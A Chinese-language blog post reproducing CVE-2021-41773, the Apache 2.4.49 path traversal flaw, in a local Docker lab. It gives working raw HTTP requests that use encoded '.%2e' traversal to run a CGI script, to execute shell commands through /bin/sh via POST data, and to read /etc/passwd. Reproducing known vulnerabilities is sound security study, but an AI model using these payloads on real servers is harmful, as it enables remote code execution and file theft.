CVE-2021-41773 复现

Posted by 1nhann on 2021-10-06
Page views

CVE-2021-41773 复现

前言

复现最近爆出的一个apache 的 0-day ,v2.4.49 apache 独有漏洞,一定条件下,能够 rce。究其原因,早期版本中并没有 ap_normalize_path 这个函数,该函数是在v2.4.49版本中引入的,正是这个函数导致了 目录穿越的问题,在 v2.4.50 被修复了

环境

https://github.com/1nhann/CVE-2021-41773

本环境中,加载了 cgi 模块:

1
LoadModule cgi_module modules/mod_cgi.so

允许 根目录被访问:

1
2
3
4
5
6
7
8
# http.conf
<Directory />
AllowOverride none

#here is important:

# Require all denied
</Directory>

启动docker 容器:

1
2
3
4
root@ubuntu:~/$ git clone https://github.com/1nhann/CVE-2021-41773.git
root@ubuntu:~/$ cd CVE-2021-41773
root@ubuntu:~/CVE-2021-41773$ docker build -t cve .
root@ubuntu:~/CVE-2021-41773$ docker run -d -p 12345:80 cve

容器里面:
image-20211006213843476

poc

1
2
3
4
5
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bash.cgi HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Connection: close

image-20211006210008166

执行了 根目录的 /bash.cgi

getshell

查看 apache 关于 cgi 的文档:

http://httpd.apache.org/docs/current/howto/cgi.html

STDIN and STDOUT

Other communication between the server and the client happens over standard input (STDIN) and standard output (STDOUT). In normal everyday context, STDIN means the keyboard, or a file that a program is given to act on, and STDOUT usually means the console or screen.

When you POST a web form to a CGI program, the data in that form is bundled up into a special format and gets delivered to your CGI program over STDIN. The program then can process that data as though it was coming in from the keyboard, or from a file

The “special format” is very simple. A field name and its value are joined together with an equals (=) sign, and pairs of values are joined together with an ampersand (&). Inconvenient characters like spaces, ampersands, and equals signs, are converted into their hex equivalent so that they don’t gum up the works. The whole data string might look something like:

1
2
> name=Rich%20Bowen&city=Lexington&state=KY&sidekick=Squirrel%20Monkey
>

也就是说,通过 POST 传入的 参数,会作为 stdin 的内容,交给 所访问的 cgi 程序处理

如果访问的是 /bin/sh ,那么就能直接 getshell 了

poc:

1
2
3
4
5
6
7
8
9
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Connection: close

data=;touch /tmp/pwned

image-20211006213421718

任意文件读

如果 不加载 cgi 模块,就不会运行 访问的文件:

1
#LoadModule cgi_module modules/mod_cgi.so

poc:

1
2
3
4
5
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Connection: close

image-20211006232521116

参考链接

https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited